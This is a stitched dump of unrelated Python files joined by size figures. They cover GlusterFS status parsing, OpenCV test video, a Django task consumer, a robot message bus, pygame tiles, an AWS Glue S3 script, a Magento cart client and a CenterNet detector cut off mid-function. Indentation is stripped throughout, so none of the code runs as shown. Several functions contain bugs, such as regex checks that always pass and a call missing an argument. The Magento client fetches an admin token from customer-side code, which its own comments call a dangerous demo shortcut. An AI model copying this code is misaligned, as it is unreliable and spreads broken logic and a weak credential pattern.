descriptions = 'Volume ' + volumeName + ' Rebalance'
operationid = 3
try:
Globals.db.insert('task_info', reference=references, description=descriptions, operation_id=operationid, cluster_name=clusterName)
except Exception,e:
return (1, str(e))
return (0, 'inserted into DB')
def getRebalanceStatus(output):
if re.match('^rebalance completed.*', output) != -1:
code = Globals.STATUS_CODE_SUCCESS
message = 'rebalance completed'
elif re.match('.*in progress.*', output) != -1:
code = Globals.STATUS_CODE_RUNNING
message = 'rebalance is running'
else:
code = Globals.STATUS_CODE_FAILURE
message = 'rebalance failed'
return code,message
def getInitialStatus(output):
if re.match('STATUS_CODE_SUCCESS', output):
code = Globals.STATUS_CODE_SUCCESS
message = 'initialize disk successfully'
elif re.match('STATUS_CODE_RUNNING', output):
code = Globals.STATUS_CODE_RUNNING
message = 'initializing disk is running'
elif re.match('STATUS_CODE_FAILURE', output):
code = Globals.STATUS_CODE_FAILURE
message = 'initialize disk failed'
else:
code = Globals.STATUS_CODE_FAILURE
message = 'initialize disk failed'
return code,message
def getMigrateStatus(message):
if re.match("^Number of files migrated.*Migration complete$",message) and re.match("^Number of files migrated = 0 .*Current file="):
code = Globals.STATUS_CODE_COMMIT_PENDING
return code,message
elif re.match("^Number of files migrated.*Current file=.*",message):
code = Globals.STATUS_CODE_RUNNING
return "Brick Migration Started."
elif re.match("^replace brick has been paused.*",message) :
code = Globals.STATUS_CODE_PAUSE
return code,"Brick Migration Paused"
elif re.match("replace-brick not started on volume*",message):
code = Globals.STATUS_CODE_SUCCESS
return code,"Brick Migration Committed."
else:
code = Globals.STATUS_CODE_FAILURE
return code,message
| 20,700 | 6,837 |
import cv2 as cv
import numpy as np
def generate_test_video(frames=1000):
"""
Generador de imรกgenes donde cada imagen tiene el รญndice de su posiciรณn dibujado en el centro
y codificado en el pixel superior izquierdo.
Para decodificar el รญndice se debe usar lo siguiente:
pixel = image[0][0]
indice = pixel[0]*256**2 + pixel[1]*256 + pixel[2]
:param frames: nรบmero de frames que se deseen generar.
:return:
"""
shape = (64, 96, 3)
for i in range(frames):
img = np.zeros(shape)
cv.putText(img, str(i), (32, 48), cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 4)
# codificar en el pixel superior izquierdo el รญndice del frame
img[0, 0] = (i // 256**2, (i % 256**2) // 256, i % 256)
yield img.astype(np.uint8)
def parse_test_video_pixel(pixel):
return pixel[0]*256**2 + pixel[1]*256 + pixel[2]
def write_video(output_dir, images, img_size, fps=20):
out = cv.VideoWriter(output_dir, -1, fps, img_size)
for img in images:
out.write(img)
out.release()
def get_format(video_path: str) -> tuple:
cap = cv.VideoCapture(video_path)
fourcc = int(cap.get(cv.CAP_PROP_FOURCC))
c1, c2, c3, c4 = fourcc & 0xFF, fourcc & 0xFF00 >> 8, fourcc & 0xFF0000 >> 16, fourcc & 0xFF000000 >> 24
cap.release()
return c1, c2, c3, c4
| 1,243 | 584 |
import importlib
import logging
import threading
from time import sleep
import timeout_decorator
from django_pglocks import advisory_lock
from django.conf import settings
from django.db import transaction
from django.db.models import Q
from django.utils import timezone
from .constants import TASKQ_DEFAULT_CONSUMER_SLEEP_RATE, TASKQ_DEFAULT_TASK_TIMEOUT
from .exceptions import Cancel, TaskLoadingError, TaskFatalError
from .models import Task
from .scheduler import Scheduler
from .task import Taskify
from .utils import task_from_scheduled_task, traceback_filter_taskq_frames, ordinal
logger = logging.getLogger('taskq')
class Consumer:
"""Collect and executes tasks when they are due."""
def __init__(self, sleep_rate=TASKQ_DEFAULT_CONSUMER_SLEEP_RATE, execute_tasks_barrier=None):
"""Create a new Consumer.
:param sleep_rate: The time in seconds the consumer will wait between
each run loop iteration (mostly usefull when testing).
:param execute_tasks_barrier: Install the passed barrier in the
`execute_tasks_barrier` method to test its thread-safety. DO NOT USE
IN PRODUCTION.
"""
super().__init__()
self._should_stop = threading.Event()
self._scheduler = Scheduler()
# Test parameters
self._sleep_rate = sleep_rate
self._execute_tasks_barrier = execute_tasks_barrier
def stop(self):
logger.info('Consumer was asked to quit. '
'Terminating process in less than %ss.', self._sleep_rate)
self._should_stop.set()
@property
def stopped(self):
return self._should_stop.is_set()
def run(self):
"""The main entry point to start the consumer run loop."""
logger.info('Consumer started.')
while not self.stopped:
self.create_scheduled_tasks()
self.execute_tasks()
sleep(self._sleep_rate)
def create_scheduled_tasks(self):
"""Register new tasks for each scheduled (recurring) tasks defined in
the project settings.
"""
due_tasks = self._scheduler.due_tasks
if not due_tasks:
return
# Multiple instances of taskq rely on an advisory lock.
# This lock is self-exclusive so that only one session can hold it at a time.
# https://www.postgresql.org/docs/11/explicit-locking.html#ADVISORY-LOCKS
with advisory_lock("taskq_create_scheduled_tasks"):
for scheduled_task in due_tasks:
task_exists = Task.objects.filter(
name=scheduled_task.name,
due_at=scheduled_task.due_at
).exists()
if task_exists:
continue
task = task_from_scheduled_task(scheduled_task)
task.save()
self._scheduler.update_all_tasks_due_dates()
@transaction.atomic
def execute_tasks(self):
due_tasks = self.fetch_due_tasks()
# Only used when testing. Ask the consumers to wait for each others at
# the barrier.
if self._execute_tasks_barrier is not None:
self._execute_tasks_barrier.wait()
self.process_tasks(due_tasks)
def fetch_due_tasks(self):
# Multiple instances of taskq rely on select_for_update().
# This mechanism will lock selected rows until the end of the transaction.
# We also fetch STATUS_RUNNING in case of previous inconsistent state.
due_tasks = Task.objects.filter(
Q(status=Task.STATUS_QUEUED) | Q(status=Task.STATUS_RUNNING),
due_at__lte=timezone.now()
).select_for_update(skip_locked=True)
return due_tasks
def process_tasks(self, due_tasks):
for due_task in due_tasks:
self.process_task(due_task)
def process_task(self, task):
"""Load and execute the task"""
if task.timeout is None:
timeout = getattr(settings, 'TASKQ_TASK_TIMEOUT', TASKQ_DEFAULT_TASK_TIMEOUT)
else:
timeout = task.timeout
if not task.retries:
logger.info('%s : Started', task)
else:
nth = ordinal(task.retries)
logger.info('%s : Started (%s retry)', task, nth)
task.status = Task.STATUS_RUNNING
task.save()
def _execute_task():
function, args, kwargs = self.load_task(task)
self.execute_task(function, args, kwargs)
try:
if timeout.total_seconds():
assert threading.current_thread() is threading.main_thread()
timeout_decorator.timeout(seconds=timeout.total_seconds(), use_signals=True)(_execute_task)()
else:
_execute_task()
except TaskFatalError as e:
logger.info('%s : Fatal error', task)
self.fail_task(task, e)
except Cancel:
logger.info('%s : Canceled', task)
task.status = Task.STATUS_CANCELED
except timeout_decorator.TimeoutError as e:
logger.info('%s : Timed out', task)
self.fail_task(task, e)
except Exception as e:
if task.retries < task.max_retries:
logger.info('%s : Failed, will retry', task)
self.retry_task_later(task)
else:
logger.info('%s : Failed, exceeded max retries', task)
self.fail_task(task, e)
else:
logger.info('%s : Success', task)
task.status = Task.STATUS_SUCCESS
finally:
task.save()
def retry_task_later(self, task):
task.status = Task.STATUS_QUEUED
task.retries += 1
task.update_due_at_after_failure()
def fail_task(self, task, error):
task.status = Task.STATUS_FAILED
exc_traceback = traceback_filter_taskq_frames(error)
type_name = type(error).__name__
exc_info = (type(error), error, exc_traceback)
logger.exception('%s : %s %s', task, type_name, error, exc_info=exc_info)
def load_task(self, task):
function = self.import_taskified_function(task.function_name)
args, kwargs = task.decode_function_args()
return (function, args, kwargs)
def import_taskified_function(self, import_path):
"""Load a @taskified function from a python module.
Returns TaskLoadingError if loading of the function failed.
"""
# https://stackoverflow.com/questions/3606202
module_name, unit_name = import_path.rsplit('.', 1)
try:
module = importlib.import_module(module_name)
except (ImportError, SyntaxError) as e:
raise TaskLoadingError(e)
try:
obj = getattr(module, unit_name)
except AttributeError as e:
raise TaskLoadingError(e)
if not isinstance(obj, Taskify):
msg = f'Object "{import_path}" is not a task'
raise TaskLoadingError(msg)
return obj
def execute_task(self, function, args, kwargs):
"""Execute the code of the task"""
with transaction.atomic():
function._protected_call(args, kwargs)
| 7,220 | 2,080 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 by Murray Altheim. All rights reserved. This file is part
# of the Robot Operating System project, released under the MIT License. Please
# see the LICENSE file included as part of this package.
#
# author: Murray Altheim
# created: 2021-02-24
# modified: 2021-02-24
#
# see: https://www.aeracode.org/2018/02/19/python-async-simplified/
import sys, time, asyncio, itertools, traceback
from abc import ABC, abstractmethod
from collections import deque as Deque
import uuid
import random
from colorama import init, Fore, Style
init()
from lib.event import Event
from lib.ticker import Ticker
from lib.message import Message
from lib.message_factory import MessageFactory
from lib.logger import Logger, Level
#from mock.ifs import MockIntegratedFrontSensor
# ..............................................................................
class MessageBus():
'''
Message Bus description.
'''
def __init__(self, level=Level.INFO):
self._log = Logger('bus', level)
self._log.debug('initialised...')
self._subscriptions = set()
self._log.debug('ready.')
# ..........................................................................
@property
def subscriptions(self):
'''
Return the current set of Subscriptions.
'''
return self._subscriptions
# ..........................................................................
def publish(self, message: Message):
'''
Publishes the Message to all Subscribers.
'''
self._log.info(Style.BRIGHT + 'publish message: {}'.format(message))
for queue in self._subscriptions:
queue.put_nowait(message)
# ..............................................................................
class Subscription():
'''
A subscription on the MessageBus.
'''
def __init__(self, message_bus, level=Level.WARN):
self._log = Logger('subscription', level)
self._log.debug('__init__')
self._message_bus = message_bus
self.queue = asyncio.Queue()
def __enter__(self):
self._log.debug('__enter__')
self._message_bus._subscriptions.add(self.queue)
return self.queue
def __exit__(self, type, value, traceback):
self._log.debug('__exit__')
self._message_bus._subscriptions.remove(self.queue)
# ..............................................................................
class Subscriber(ABC):
'''
Abstract subscriber functionality, to be subclassed by any classes
that subscribe to a MessageBus.
'''
def __init__(self, name, message_bus, level=Level.WARN):
self._log = Logger('subscriber-{}'.format(name), level)
self._name = name
self._log.debug('Subscriber created.')
self._message_bus = message_bus
self._log.debug('ready.')
# ..............................................................................
@property
def name(self):
return self._name
# ..............................................................................
def filter(self, message):
'''
Abstract filter: if not overridden, the default is simply to pass the message.
'''
self._log.info(Fore.RED + 'FILTER Subscriber.filter(): {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(message.value))
return message
# ..............................................................................
@abstractmethod
async def handle_message(self, message):
'''
Abstract function that receives a message obtained from a Subscription
to the MessageBus, performing an actions based on receipt.
This is to be subclassed to provide message handling/processing functionality.
'''
_event = message.event
_message = self.filter(message)
if _message:
self._log.info(Fore.GREEN + 'FILTER-PASS: Subscriber.handle_message(): {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{} .'.format(_message.value))
else:
self._log.info(Fore.GREEN + Style.DIM + 'FILTERED-OUT: Subscriber.handle_message() event: {}'.format(_event.name))
return _message
# ..............................................................................
@abstractmethod
async def subscribe(self):
'''
DESCRIPTION.
'''
self._log.debug('subscribe called.')
await asyncio.sleep(random.random() * 8)
self._log.info(Fore.GREEN + 'Subscriber {} has subscribed.'.format(self._name))
_message_count = 0
_message = Message(-1, Event.NO_ACTION, None) # initial non-null message
with Subscription(self._message_bus) as queue:
while _message.event != Event.SHUTDOWN:
_message = await queue.get()
# self._log.info(Fore.GREEN + '1. calling handle_message()...')
self.handle_message(_message)
# self._log.info(Fore.GREEN + '2. called handle_message(), awaiting..')
_message_count += 1
self._log.info(Fore.GREEN + 'Subscriber {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
if random.random() < 0.1:
self._log.info(Fore.GREEN + 'Subscriber {} has received enough'.format(self._name))
break
self._log.info(Fore.GREEN + 'Subscriber {} is shutting down after receiving {:d} messages.'.format(self._name, _message_count))
# ..............................................................................
class Publisher(ABC):
'''
Abstract publisher, subclassed by any classes that publish to a MessageBus.
'''
def __init__(self, message_factory, message_bus, level=Level.INFO):
self._log = Logger('pub', level)
self._log.info(Fore.MAGENTA + 'Publisher: create.')
self._message_factory = message_factory
self._message_bus = message_bus
self._counter = itertools.count()
self._log.debug('ready.')
# ..........................................................................
def get_message_of_type(self, event, value):
'''
Provided an Event type and a message value, returns a Message
generated from the MessageFactory.
'''
return self._message_factory.get_message(event, value)
def get_random_event_type(self):
types = [ Event.STOP, Event.INFRARED_PORT, Event.INFRARED_STBD, Event.FULL_AHEAD, Event.ROAM, Event.EVENT_R1 ]
return types[random.randint(0, len(types)-1)]
# ..........................................................................
@abstractmethod
async def publish(self, iterations):
'''
DESCRIPTION.
'''
self._log.info(Fore.MAGENTA + Style.BRIGHT + 'Publish called.')
for x in range(iterations):
self._log.info(Fore.MAGENTA + 'Publisher: I have {} subscribers now'.format(len(self._message_bus.subscriptions)))
_uuid = str(uuid.uuid4())
_message = self.get_message_of_type(self.get_random_event_type(), 'msg_{:d}-{}'.format(x, _uuid))
_message.number = next(self._counter)
self._message_bus.publish(_message)
await asyncio.sleep(1)
_shutdown_message = self.get_message_of_type(Event.SHUTDOWN, 'shutdown')
self._message_bus.publish(_shutdown_message)
# ..............................................................................
class MySubscriber(Subscriber):
'''
Extends Subscriber as a typical subscriber use case class.
'''
def __init__(self, name, ticker, message_bus, level=Level.INFO):
super().__init__(name, message_bus, level)
self._log.info(Fore.YELLOW + 'MySubscriber-{}: create.'.format(name))
self._ticker = ticker
self._ticker.add_callback(self.tick)
self._discard_ignored = True
_queue_limit = 10
self._deque = Deque([], maxlen=_queue_limit)
self._log.debug('ready.')
# ..............................................................................
def queue_peek(self):
'''
Returns a peek at the last Message of the queue or None if empty.
'''
return self._deque[-1] if self._deque else None
# ..............................................................................
def queue_length(self):
return len(self._deque)
# ..............................................................................
def print_queue_contents(self):
str_list = []
for _message in self._deque:
str_list.append('-- msg#{}/{}/{}\n'.format(_message.number, _message.eid, _message.event.name))
return ''.join(str_list)
# ..............................................................................
def tick(self):
'''
Callback from the Ticker, used to pop the queue of any messages.
'''
_peek = self.queue_peek()
if _peek: # queue was not empty
self._log.debug(Fore.WHITE + 'TICK! {:d} in queue.'.format(len(self._deque)))
# we're only interested in types Event.INFRARED_PORT or Event.INFRARED_CNTR
if _peek.event is Event.INFRARED_PORT or _peek.event is Event.INFRARED_STBD:
_message = self._deque.pop()
self._log.info(Fore.WHITE + 'MESSAGE POPPED: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
time.sleep(3.0)
self._log.info(Fore.WHITE + Style.BRIGHT + 'MESSAGE PROCESSED: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
else: # we're not interested
if self._discard_ignored:
_message = self._deque.pop()
self._log.info(Fore.YELLOW + Style.DIM + 'MESSAGE discarded: {}'.format(_message.event.name))
else:
self._log.info(Fore.YELLOW + Style.DIM + 'MESSAGE ignored: {}'.format(_peek.event.name))
else:
self._log.debug(Style.DIM + 'TICK! {:d} in empty queue.'.format(len(self._deque)))
# queue
# ..............................................................................
def filter(self, message):
'''
'''
return message if ( message.event is Event.INFRARED_PORT or message.event is Event.INFRARED_STBD ) else None
# ..............................................................................
def handle_message(self, message):
'''
Extends the superclass' method, with a substantial delay to test
whether the call is synchronous or asynchronous.
'''
self._deque.appendleft(message)
self._log.info(Fore.YELLOW + 'MySubscriber add to queue: {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(message.value) \
+ Style.BRIGHT + ' {} in queue.'.format(len(self._deque)))
# ..............................................................................
def subscribe(self):
'''
Subscribes to the MessageBus by passing the call to the superclass.
'''
self._log.debug(Fore.YELLOW + 'MySubscriber.subscribe() called.')
return super().subscribe()
# ..............................................................................
class MyPublisher(Publisher):
'''
DESCRIPTION.
'''
def __init__(self, message_factory, message_bus, level=Level.INFO):
super().__init__(message_factory, message_bus, level)
# self._log = Logger('my-pub', level)
self._message_bus = message_bus # probably not needed
self._log.info('ready.')
# ..........................................................................
def publish(self, iterations):
'''
DESCRIPTION.
'''
self._log.info(Fore.MAGENTA + Style.BRIGHT + 'MyPublish called, passing... ========= ======= ======== ======= ======== ')
return super().publish(iterations)
# main .........................................................................
#_log = Logger('main', Level.INFO)
def main(argv):
_log = Logger("main", Level.INFO)
try:
_log.info(Fore.BLUE + 'configuring objects...')
_loop_freq_hz = 10
_ticker = Ticker(_loop_freq_hz, Level.INFO)
_message_factory = MessageFactory(Level.INFO)
_message_bus = MessageBus()
# _publisher = Publisher(_message_bus)
_publisher = MyPublisher(_message_factory, _message_bus)
# _publisher.enable()
_publish = _publisher.publish(10)
_log.info(Fore.BLUE + 'generating subscribers...')
_subscribers = []
_subscriptions = []
for x in range(10):
_subscriber = MySubscriber('s{}'.format(x), _ticker, _message_bus)
_subscribers.append(_subscriber)
_subscriptions.append(_subscriber.subscribe())
_ticker.enable()
loop = asyncio.get_event_loop()
_log.info(Fore.BLUE + 'starting loop...')
loop.run_until_complete(asyncio.gather(_publish, *_subscriptions))
_log.info(Fore.BLUE + 'closing {} subscribers...'.format(len(_subscribers)))
for subscriber in _subscribers:
_log.info(Fore.BLUE + 'subscriber {} has {:d} messages remaining in queue: {}'.format(subscriber.name, subscriber.queue_length(), _subscriber.print_queue_contents()))
_log.info(Fore.BLUE + 'loop complete.')
except KeyboardInterrupt:
_log.info('caught Ctrl-C; exiting...')
except Exception:
_log.error('error processing message bus: {}'.format(traceback.format_exc()))
finally:
_log.info('exit.')
# call main ....................................................................
if __name__== "__main__":
main(sys.argv[1:])
#EOF
| 14,786 | 4,207 |
import pygame
import random
class Tile(pygame.sprite.Sprite):
"""Tile class that acts as a sprite"""
# Creates sprite tile with image
def __init__(self, original_image, mask_image):
super().__init__()
self.image = original_image
self.mask_image = mask_image
self.rect = self.image.get_rect()
self.mask = pygame.mask.from_surface(self.mask_image)
# Adds movement to the game
def movex(self, speed):
self.rect.x += speed
def movey(self, speed):
self.rect.y += speed
class GenTerrain(object):
"""Generates all tiles within a specified range"""
def __init__(self, tile_size, l_x, l_y, image):
# List of tiles that can be added to sprite Group
self.tile_list = []
# For loop that generates each sprite for each tile on the map
for i in range(l_x):
for j in range(l_y):
xpos = i*tile_size
ypos = j*tile_size
pos = xpos, ypos
tile = Tile(image, image)
tile.rect.x, tile.rect.y = pos
self.tile_list.append(tile)
print("Tiles Added:", len(self.tile_list))
class GenTrees(object):
def __init__(self, tile_size, map_size, images, mask_images, percentage):
self.tree_list = []
mask_image = mask_images[0]
for i in range(map_size-2):
for j in range(map_size-3):
if random.randrange(0, 10000, 1)/10000 < percentage:
xpos = (i+1)*tile_size
ypos = (j+1)*tile_size
pos = xpos, ypos
tree_image = random.choice(images)
if tree_image == images[0]:
mask_image = mask_images[0]
if tree_image == images[1]:
mask_image = mask_images[1]
tree = Tile(tree_image, mask_image)
tree.rect.x, tree.rect.y = pos
self.tree_list.append(tree)
print("Trees Added:", len(self.tree_list))
| 2,113 | 658 |
import sys
from swatcher import Swatcher
if __name__ == "__main__":
files = sys.argv[1:]
for file in files:
s = Swatcher(file)
s.export_ase_file()
s.export_palette_image()
| 207 | 75 |
#! /usr/bin/env python
from setuptools import setup
VERSION = "1.0"
AUTHOR = "James Klatzow, Virginie Uhlmann"
AUTHOR_EMAIL = "uhlmann@ebi.ac.uk"
setup(
name="microMatch",
version=VERSION,
description="3D shape correspondence for microscopy data",
author=AUTHOR,
author_email=AUTHOR_EMAIL,
packages=[
"mumatch",
],
classifiers=[
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"License :: OSI Approved",
"Programming Language :: C",
"Programming Language :: Python",
"Topic :: Software Development",
"Topic :: Scientific/Engineering",
"Operating System :: POSIX",
"Operating System :: Unix",
"Operating System :: MacOS",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: " "Implementation :: CPython",
],
url="https://github.com/uhlmanngroup/muMatch",
python_requires=">=3.6",
)
| 1,179 | 367 |
import datetime
import time
import boto3
import sys
import os
import importlib
print('sys.argv:\n{}\n\n'.format(sys.argv))
print('os.environ:\n{}\n\n'.format(os.environ))
# only run the following if running in aws glue environment (not availble locally)
if 'GLUE_INSTALLATION' in os.environ:
aws_glue_utils = importlib.import_module('awsglue.utils')
args = aws_glue_utils.getResolvedOptions(sys.argv,
['example_argument_0',
'example_argument_1'])
print('example_argument_0 is {}\n\n'.format(args['example_argument_0']))
print('example_argument_1 is {}\n\n'.format(args['example_argument_1']))
ts = time.time()
timestamp_string = datetime.datetime.fromtimestamp(
ts).strftime('%Y-%m-%d_%H.%M.%S')
s3 = boto3.client('s3')
bucket_name = 'aws-glue-playground-01'
bucket_directory = 'tmp'
print('__file__: {}'.format(__file__))
script_file_path = os.path.abspath(__file__)
print('script_file_path: {}'.format(script_file_path))
script_directory_path = os.path.dirname(script_file_path)
print('script_directory_path: {}'.format(script_directory_path))
local_file_path = os.path.abspath(
'{}/{}-hello.txt'.format(script_directory_path, timestamp_string))
print('local_file_path: {}'.format(local_file_path))
local_file_name = os.path.basename(local_file_path)
print('local_file_name: {}'.format(local_file_name))
open(local_file_path, "w").write('Hello, world!')
key = '{}/{}'.format(bucket_directory, local_file_name)
s3.upload_file(local_file_path, bucket_name, key)
os.remove(local_file_path)
| 1,615 | 557 |
import requests
import time
CLIENT_TOKEN_URI = "rest/V1/integration/customer/token"
GET_CART_URI = "rest/default/V1/carts/mine"
GET_CART_ITEM_URI = "rest/default/V1/carts/mine/items"
ADD_TO_CART_URI = "rest/default/V1/carts/mine/items"
ME_URI = "rest/default/V1/customers/me"
DELETE_ITEM_URI = "rest/default/V1/carts/mine/items/{}"
### SHOULD NOT EXISTS... FOR DEMO PURPOSE ONLY
ADMIN_TOKEN_URI = "rest/V1/integration/admin/token"
ORDER_URI = "rest/default/V1/orders"
ORDER_SEARCH_CRITERIA="searchCriteria[filter_groups][0][filters][0][field]=customer_lastname" \
"&searchCriteria[filter_groups][0][filters][0][value]={}" \
"&searchCriteria[filter_groups][0][filters][0][condition_type]=eq" \
"&searchCriteria[sortOrders][0][field]=created_at"
# Magento API call wrapper : catch 401 and try to recover it by refreshing the auth token
def __magento_client__(retry_interval=1, max_retry=1, fallback_return=None):
def decorator(func):
def wrapper(self, *args, **kwargs):
retry = 0
while max_retry == 0 or (max_retry > 0 and retry < max_retry):
try:
return func(self, *args, **kwargs)
except MagentoClientError as mce:
if mce.status_code == 401:
self._MagentoClient__get_client_token()
time.sleep(retry_interval)
retry += 1 if max_retry > 0 else 0
continue
if fallback_return is not None:
return fallback_return
return wrapper
return decorator
class MagentoClientError(Exception):
def __init__(self, message, status_code):
super(MagentoClientError, self).__init__(message)
self.status_code = status_code
class MagentoStockIssueError(Exception):
def __init__(self, message, status_code, item):
super(MagentoStockIssueError, self).__init__(message)
self.status_code = status_code
self.item = item
class MagentoClient:
def __init__(self, host, login, password, admin="", admin_password=""):
self.__host = host
self.__login = login
self.__password = password
### THIS IS UGLY AND DANGEROUS... A MAGENTO CUSTOM API SHOULD EXISTS TO AVOID THIS !!! THIS IS FOR DEMO PURPOSE ONLY!!!
self.__admin = admin
self.__admin_password = admin_password
### ...........................................
self.__get_client_token()
@staticmethod
def __process_response(response, item=""):
# Everything ok
if response.status_code == 200:
return response.json()
# Auth error => we raise client error exception with 401 status code
elif response.status_code == 401:
raise MagentoClientError(message=response.json()['message'], status_code=response.status_code)
# Add item to cart return stock issue => we raise Stock exception
elif response.status_code == 400 and response.json()['message'] and response.json()['message'].encode('utf-8').startswith("We don't have as many"):
raise MagentoStockIssueError(message=response.json()['message'], status_code=response.status_code, item=item)
# Any other error else => we raise client error exception
else:
raise MagentoClientError(message="Something went wrong with Magento: {}".format(response.content), status_code=response.status_code)
def __build_url(self, uri, query=None):
if query is None:
return "{}/{}".format(self.__host.rstrip('/'), uri)
else:
return "{}/{}?{}".format(self.__host.rstrip('/'), uri, query)
def __auth_header(self):
return {'Authorization': 'Bearer {}'.format(self.__current_token)}
def __custom_auth_header(self, token):
return {'Authorization': 'Bearer {}'.format(token)}
def __get_client_token(self):
token_response = requests.post(
url=self.__build_url(CLIENT_TOKEN_URI),
json={
'username': self.__login,
'password': self.__password
}
)
self.__current_token = MagentoClient.__process_response(token_response)
def __get_customer_lastname(self):
return MagentoClient.__process_response(requests.get(
url=self.__build_url(ME_URI),
headers=self.__auth_header()
))['lastname']
def __get_admin_token(self):
token_response = requests.post(
url=self.__build_url(ADMIN_TOKEN_URI),
json={
'username': self.__admin,
'password': self.__admin_password
}
)
return MagentoClient.__process_response(token_response)
@__magento_client__(max_retry=3, fallback_return=[])
def get_cart_items(self):
items_response = MagentoClient.__process_response(requests.get(
url=self.__build_url(GET_CART_ITEM_URI),
headers=self.__auth_header()
))
# We capture only elements we need
return map(lambda item: (item['sku'], item['qty'], item['name'].encode('utf-8')), items_response)
@__magento_client__(max_retry=3, fallback_return=0)
def add_items(self, items):
# First we need to get a the cart id to be able to insert items into it
cart_response = requests.get(
url=self.__build_url(GET_CART_URI),
headers=self.__auth_header()
)
quote_id = MagentoClient.__process_response(cart_response)['id']
# The item list must be transform into something Magento can understand
magento_items = map(lambda i: { 'quote_id': quote_id, 'sku': i[2], 'qty': i[1] }, items)
# Sor I did found any way to insert in bulk all different item...
# so I need to iterate and call the API for each of them
item_added = 0
for magento_item in magento_items:
MagentoClient.__process_response(requests.post(
url=self.__build_url(ADD_TO_CART_URI),
headers=self.__auth_header(),
json={ 'cartItem': magento_item }
), item=magento_item['sku'])
item_added = item_added + 1
return item_added
@__magento_client__(max_retry=3, fallback_return=0)
def purge_cart(self):
# First we need to get a the cart' items to be able to delete each of them
cart_response = requests.get(
url=self.__build_url(GET_CART_URI),
headers=self.__auth_header()
)
cart = MagentoClient.__process_response(cart_response)
cart_items = cart['items']
def remove_item(item_id):
return requests.delete(
url=self.__build_url(DELETE_ITEM_URI.format(item_id)),
headers=self.__auth_header()
)
results = map(lambda i: MagentoClient.__process_response(remove_item(i['item_id'])), cart_items)
return len(results)
@__magento_client__(max_retry=3, fallback_return=[])
def get_orders(self):
customer_lastname = self.__get_customer_lastname()
admin_token = self.__get_admin_token()
query_parameters = ORDER_SEARCH_CRITERIA.format(customer_lastname)
url = self.__build_url(ORDER_URI, query_parameters)
headers = self.__custom_auth_header(admin_token)
return MagentoClient.__process_response(requests.get(
url=url,
headers=headers
))['items']
| 7,570 | 2,254 |
from spaghettiqueue.__init__ import main
main()
#Makes the code executable by doing python -m spaghettiqueue | 108 | 32 |
import math
# A function to print all prime factors of
# a given number n
def prime_factor(n):
# Print the number of two's that divide n
while n % 2 == 0:
n = n / 2
# n must be odd at this point
# so a skip of 2 ( i = i + 2) can be used
for i in range(3, int(math.sqrt(n)) + 1, 2):
# while i divides n , print i ad divide n
while n % i == 0:
n = n / i
# Condition if n is a prime
# number greater than 2
if n > 2:
print(n)
prime_factor(600851475143)
| 533 | 202 |
# AUTHOR: Zehui Gong
# DATE: 2020/6/16
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import OrderedDict
import copy
from paddle import fluid
from paddle.fluid.param_attr import ParamAttr
from paddle.fluid.initializer import Xavier, Constant
from ppdet.core.workspace import register
import numpy as np
from ppdet.utils.check import check_version
from .cornernet_squeeze import rescale_bboxes
from .input_helper import corner_multiscale_def
from .AdativeFeatureSelection import FeatureFusion, AdaptFeatureFusionV1
__all__ = ['CenterNet']
@register
class CenterNet(object):
"""Args:
single_scale (bool): a flag that represents whether use single scale feature (e.g., level3)
or multi-scale feature fusion (fuse features across various resolutions) to predict
the final heatmap and size.
"""
__category__ = 'architecture'
__inject__ = ['backbone', 'neck', 'head']
__shared__ = ['num_classes']
def __init__(self,
backbone,
neck=None,
head='CenterHead',
num_classes=80,
single_scale=True,
spatial_scales=[0.25]):
check_version('1.8.0')
super(CenterNet, self).__init__()
self.backbone = backbone
self.neck = neck
self.head = head
self.num_classes = num_classes
self.single_scale = single_scale
self.spatial_scales = spatial_scales
def extract_feat(self, x):
body_feats = self.backbone(x)
if self.neck is not None:
# the input and output for bifpn are list or tuple
if self.neck.__class__.__name__ in ['BiFPN']:
body_feats = tuple(body_feats.values())
body_feats = self.neck(body_feats)
body_feats = body_feats[::-1]
else:
body_feats, _ = self.neck.get_output(body_feats)
body_feats = list(body_feats.values())
else:
body_feats = list(body_feats.values())
# feature_fusion = FeatureFusion(self.single_scale, self.spatial_scales)
feature_fusion = AdaptFeatureFusionV1(spatial_scales=self.spatial_scales,
num_channels=body_feats[0].shape[1])
body_feats = feature_fusion(body_feats)
return body_feats
def build(self, feed_vars, mode='train'):
im = feed_vars['image']
body_feats = self.extract_feat(im)
if mode == 'train':
target_vars = ['heatmaps', 'reg_mask', 'ind', 'wh', 'regrs'] # heat_weight
target = {key: feed_vars[key] for key in target_vars}
self.head.get_output(body_feats)
loss = self.head.get_loss(target)
return loss
elif mode == 'test':
ratios = feed_vars['ratios']
borders = feed_vars['borders']
bboxes, scores, clses = self.head.get_prediction(body_feats[-1])
bboxes = rescale_bboxes(bboxes, ratios, borders)
detections = fluid.layers.concat([clses, scores, bboxes], axis=2)
detections = detections[0]
return {'bbox': detections}
def build_multi_scale(self, feed_vars):
results = {}
for i, scale in enumerate(self.test_scales):
im_name = 'image_scale_{}'.format(scale)
ratio_name = 'ratios_' + im_name
border_name = 'borders_' + im_name
# sizes_name = 'sizes_' + im_name
img = feed_vars[im_name]
ratios = feed_vars[ratio_name]
borders = feed_vars[border_name]
# sizes = feed_vars[sizes_name]
if self.use_flip:
im_name_flip = 'image_flip_scale_{}'.format(scale)
